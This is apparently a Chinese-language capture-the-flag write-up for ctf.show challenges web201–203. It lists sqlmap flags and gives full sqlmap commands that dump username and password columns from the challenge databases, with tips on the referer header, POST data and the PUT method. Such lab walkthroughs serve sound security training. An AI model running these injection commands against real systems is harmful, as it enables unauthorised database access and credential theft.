web201
今天搞点轻松的,昨天晚上失眠了
基础命令
命令:python sqlmap.py xxxxxxx
-u 指定注入点
–dbs 跑库名
–tables 跑表名
–columns 跑字段名
–dump 枚举数据
-D 指定库 -T 指定表 -C指定字段
–random-agent 每次访问切换请求头 防ban
–delay=1 每次探测延时一秒 防ban
–count 查看数据量 (某个表中的数据量)
–level 1-5测试等级 level等级越高检测越详细
payload:
sqlmap.py -u "http://1fcc1808-1491-43cb-a5fc-4ca3247c64e4.challenge.ctf.show:8080/api/?id=1" --referer="ctf.show" -D ctfshow_web -T ctfshow_user -C pass,username --dump
记得要加referer=“ctf.show”
web202
要加data=“id=1”
这是告诉sqlmap ,post传参,参数为id=1
payload:
sqlmap.py -u "http://9cbaae3b-b24e-4210-8afd-94054bc3d4a5.challenge.ctf.show:8080/api/?id=1" --referer="ctf.show" --data="id=1" -D "ctfshow_web" -T "ctfshow_user" -C "pass" --dump
web203
一定要加上–headers=“Content-Type: text/plain” ,否则是按表单提交的,put接收不到
payload:
sqlmap.py -u "http://e838f0b1-f792-415e-8ae1-bf686006bfe2.challenge.ctf.show:8080/api/index.php" --method=PUT --data="id=1" --referer=ctf.show --headers="Content-Type: text/plain" --dbms=mysql -D ctfshow_web -T ctfshow_user -C pass --dump